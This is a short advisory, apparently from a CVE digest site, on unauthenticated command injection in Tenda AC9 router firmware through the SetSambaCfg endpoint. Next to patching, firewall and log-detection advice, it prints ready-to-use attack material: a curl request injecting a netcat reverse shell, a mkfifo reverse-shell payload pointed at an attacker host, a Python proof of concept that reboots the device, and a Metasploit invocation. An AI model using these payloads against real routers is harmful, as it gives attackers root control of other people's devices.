The CVE-2025-22949 vulnerability in Tenda AC9 routers (firmware v15.03.05.19) allows remote attackers to execute arbitrary commands via the `/goform/SetSambaCfg` endpoint. This occurs due to improper input sanitization in the Samba configuration function, where user-supplied data is directly passed to a system shell. An attacker can craft a malicious HTTP POST request containing OS commands in the `sambaUser` or `sambaPassword` parameters, which are then executed with root privileges. The lack of authentication checks further enables unauthenticated exploitation, leading to full device compromise.
DailyCVE Form
Platform: Tenda AC9
Version: v15.03.05.19
Vulnerability: Command Injection
Severity: Critical
Date: 04/09/2025
What Undercode Say:
Exploitation:
1. Craft a malicious POST request:
curl -X POST -d "sambaUser=admin&sambaPassword=;nc -e /bin/sh 192.168.1.100 4444;" http://target/goform/SetSambaCfg
2. Exploit via Metasploit (if module available):
use exploit/linux/http/tenda_ac9_rce set RHOSTS target run
Mitigation:
1. Apply vendor firmware patch immediately.
2. Block external access to `/goform/SetSambaCfg` via firewall:
iptables -A INPUT -p tcp --dport 80 -m string --string "/goform/SetSambaCfg" --algo bm -j DROP
3. Disable Samba if unused:
nvram set samba_enable=0 nvram commit
Detection:
Check logs for suspicious POST requests:
grep -E 'POST /goform/SetSambaCfg' /var/log/httpd.log
Reverse Shell Payloads:
;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attacker_ip 4444 >/tmp/f;
POC Code:
import requests
target = "http://192.168.1.1"
payload = ";reboot;"
requests.post(target + "/goform/SetSambaCfg", data={"sambaUser": payload})
Permanent Fix:
- Upgrade firmware beyond v15.03.05.19.
- Implement input validation on all form endpoints.
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-22949
Extra Source Hub:
Undercode
